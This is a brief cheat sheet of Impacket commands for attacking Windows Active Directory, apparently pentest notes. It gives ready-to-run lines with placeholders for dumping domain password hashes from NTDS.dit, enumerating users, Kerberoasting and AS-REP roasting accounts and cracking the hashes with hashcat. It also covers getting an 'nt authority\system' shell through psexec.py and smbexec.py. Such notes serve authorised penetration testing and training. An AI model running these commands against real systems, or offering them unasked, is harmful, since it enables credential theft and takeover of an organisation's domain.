Impacket
Impacket is a collection of Python classes for working with network protocols.
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip>
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
samrdump.py <domain>
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
sudo smbexec.py <user>:<pw>@<target>
Last modified 1yr ago